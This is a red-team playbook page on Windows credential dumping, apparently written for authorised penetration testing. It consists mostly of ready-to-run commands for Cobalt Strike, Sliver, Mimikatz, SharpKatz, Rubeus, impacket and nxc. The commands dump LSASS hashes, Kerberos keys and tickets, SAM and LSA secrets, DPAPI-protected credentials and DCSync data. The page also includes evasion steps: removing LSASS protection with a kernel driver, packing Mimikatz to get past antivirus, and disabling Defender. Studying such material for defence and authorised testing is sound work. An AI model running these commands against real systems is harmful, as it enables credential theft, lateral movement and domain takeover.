Credential Dumping
Extracting credential material (plaintext, NTLM hashes, Kerberos keys/tickets, cached creds) from a compromised host. Requires elevated/SYSTEM access for most techniques. Credentials enable lateral movement, privilege escalation, and domain compromise.
See d. Deconfliction & Reporting for credential handling and secure destruction post-engagement.
Disable LSA Protection
LSA Protection (RunAsPPL) prevents non-protected processes from opening handles to LSASS. If enabled, Mimikatz credential dumps will fail. Requires loading the mimidrv.sys kernel driver to remove the protection.
OPSEC: Loading a kernel driver is very noisy — generates Sysmon Event 6 (Driver Loaded) and may trigger EDR. Only do this if creds cannot be obtained otherwise.
Sliver
# Upload mimidrv.sys to the directory where mimikatz will execute from
upload /path/to/mimidrv.sys c:/windows/temp/mimidrv.sys
cd c:/windows/temp/
# Load driver and remove LSASS protection
mimikatz '"privilege::debug" "token::elevate" "!+" "!processprotect /process:lsass.exe /remove"'LSASS — Logon Passwords (NTLM Hashes)
Dumps NTLM hashes (and occasionally plaintext if wdigest is enabled) from logged-on users via LSASS memory. Plaintext is rare on Win10+ due to wdigest being disabled by default.
OPSEC: Opens a read handle to LSASS — logged under Event 4656, commonly flagged by EDR.
Cobalt Strike
beacon> logonpasswords
# or the full mimikatz command
beacon> mimikatz !sekurlsa::logonpasswordsSliver
# Using built-in mimikatz extension
mimikatz "token::elevate" "sekurlsa::logonpasswords" "exit"
# Using SharpKatz (avoids dropping mimikatz to disk)
execute-assembly /path/to/SharpKatz.exe --Command logonpasswords
# PEZor-packed mimikatz (bypasses AV signatures)
PEzor -unhook -antidebug -fluctuate=NA -format=dotnet -sleep=5 /path/to/mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "exit"'
execute-assembly /path/to/mimikatz.exe.packed.dotnet.exeManual
# Remote dump via impacket (needs local admin creds or hash)
impacket-secretsdump ./Administrator@TARGET -hashes ':NTHASH' -dc-ip DC_IP -target-ip TARGET_IP
# With plaintext creds
impacket-secretsdump DOMAIN/user:'Password'@TARGET -dc-ip DC_IP -target-ip TARGET_IPLSASS — Kerberos Encryption Keys
Dumps AES256, AES128, and DES keys for logged-on users. Preferred over NTLM hashes as Kerberos is the default auth protocol — blends into normal traffic better.
OPSEC: Same LSASS handle risk as logonpasswords (Event 4656).
Cobalt Strike
beacon> mimikatz !sekurlsa::ekeysSliver
mimikatz "token::elevate" "sekurlsa::ekeys" "exit"
execute-assembly /path/to/SharpKatz.exe --Command ekeysSAM Database (Local Account Hashes)
Extracts NTLM hashes of local accounts only from the Security Account Manager. Useful when a shared local admin password is reused across the environment.
OPSEC: Opens a handle to the SAM registry hive.
Cobalt Strike
beacon> mimikatz !lsadump::samSliver
mimikatz "token::elevate" "lsadump::sam" "exit"Manual
# Remote SAM dump via nxc
nxc smb TARGET --use-kcache --sam
# Or via impacket
impacket-secretsdump ./Administrator@TARGET -hashes ':NTHASH'LSA Secrets
Dumps LSA secrets from the registry (HKLM\SECURITY). Contains service account passwords, auto-logon credentials, DPAPI machine keys, and other sensitive data stored by the system.
Cobalt Strike
beacon> mimikatz !lsadump::secretsSliver
mimikatz "token::elevate" "lsadump::secrets" "exit"Domain Cached Credentials (DCC2)
Cached domain creds stored locally for offline logon (e.g. roaming laptops). Extracted from HKLM\SECURITY. Crackable but orders of magnitude slower than NTLM.
Cobalt Strike
beacon> mimikatz !lsadump::cacheSliver
mimikatz "token::elevate" "lsadump::cache" "exit"Cracking
# Format: $DCC2$<iterations>#<username>#<hash>
hashcat -m 2100 dcc2_hashes.txt wordlist.txtCredential Vault
Windows Credential Vault stores credentials for scheduled tasks, Windows services, and other system components. Distinct from Credential Manager (user-facing).
Cobalt Strike
beacon> mimikatz !vault::list
beacon> mimikatz !vault::cred /patchSliver
mimikatz '"token::elevate" "vault::list" "exit"'
mimikatz '"token::elevate" "vault::cred /patch" "exit"'Kerberos Ticket Extraction (Rubeus)
Uses legitimate Windows APIs to extract Kerberos tickets from memory — does not open a handle to LSASS, making it quieter than Mimikatz.
triage lists all tickets in the current (or all, if elevated) logon sessions. dump extracts them.
Cobalt Strike
# List all tickets
beacon> execute-assembly Rubeus.exe triage
# Dump specific TGT by LUID
beacon> execute-assembly Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrapSliver
execute-assembly /path/to/Rubeus.exe triage
execute-assembly /path/to/Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap
/nowrapformats base64 onto a single line for easy copy-paste.
DPAPI — Credential Manager & Saved Secrets
Windows Credential Manager stores saved credentials (RDP, browser, etc.) encrypted via DPAPI. Decryption requires the user’s master key, obtainable from LSASS cache (if recently used) or via MS-BKRP from the DC.
Cobalt Strike
# 1. Enumerate vaults
beacon> run vaultcmd /listcreds:"Windows Credentials" /all
beacon> execute-assembly Seatbelt.exe WindowsVault
# 2. Find credential blobs
beacon> ls C:\Users\<user>\AppData\Local\Microsoft\Credentials
beacon> execute-assembly Seatbelt.exe WindowsCredentialFiles
# 3. Get master key (option A: from LSASS cache, needs elevation)
beacon> mimikatz !sekurlsa::dpapi
# 3. Get master key (option B: request from DC via MS-BKRP, must run as the target user)
beacon> mimikatz @dpapi::masterkey /in:C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID> /rpc
# 4. Decrypt the credential blob
beacon> mimikatz dpapi::cred /in:C:\Users\<user>\AppData\Local\Microsoft\Credentials\<BLOB_ID> /masterkey:<KEY>Note: MS-BKRP method (
@modifier) must execute in the context of the user who owns the key. If running as SYSTEM or another user, impersonate the target first.
Scheduled Task Credentials
Scheduled tasks that “run whether user is logged on or not” store encrypted credentials. Same DPAPI flow but blobs are under the SYSTEM profile.
Cobalt Strike
# 1. List blobs
beacon> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials
# 2. Identify master key GUID
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<BLOB_ID>
# 3. Get master key from LSASS
beacon> mimikatz !sekurlsa::dpapi
# 4. Decrypt
beacon> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<BLOB_ID> /masterkey:<KEY>DCSync
Abuses the Directory Replication Service (MS-DRSR) protocol to replicate credential data directly from a Domain Controller. Requires replication privileges (Domain Admin, or an account with DS-Replication-Get-Changes + DS-Replication-Get-Changes-All).
OPSEC: Detectable via Event 4662 with GUIDs
1131f6aa-9c07-11d1-f79f-00c04fc2dcd2and89e95b76-444d-4c62-991a-0facbeda640c. Replication traffic normally only occurs between DCs — anomalous sources are suspicious.
Cobalt Strike
beacon> dcsync DOMAIN\krbtgtSliver
# SharpKatz — must specify domain-qualified usernames or it won't work
execute-assembly /path/to/SharpKatz.exe --Command dcsync --Domain domain.com --DomainController dc01.domain.com
# Specific user (note DOMAIN\\ double-escaped)
execute-assembly /path/to/SharpKatz.exe --Command dcsync --User DOMAIN\\Administrator --Domain domain.com --DomainController dc01.domain.comManual
# impacket
impacket-secretsdump DOMAIN/user:'Password'@DC_IP -just-dc-user krbtgt
# nxc — full NTDS dump
nxc smb dc01.domain.com -d DOMAIN -u user -p 'password' --ntds --user krbtgtBulk Dump Tools
Quick-and-dirty approaches when stealth is less of a concern.
Sliver
# LaZagne — dumps creds from browsers, mail clients, sysadmin tools, etc.
# Not C#, so may trigger AV — disable Defender first if needed
upload /path/to/LaZagne.exe
execute -o LaZagne.exe all -vManual
# Full remote dump via nxc (SAM + LSA + DPAPI + NTDS)
nxc smb dc01.domain.com --use-kcache --sam --lsa --dpapi -M ntdsutil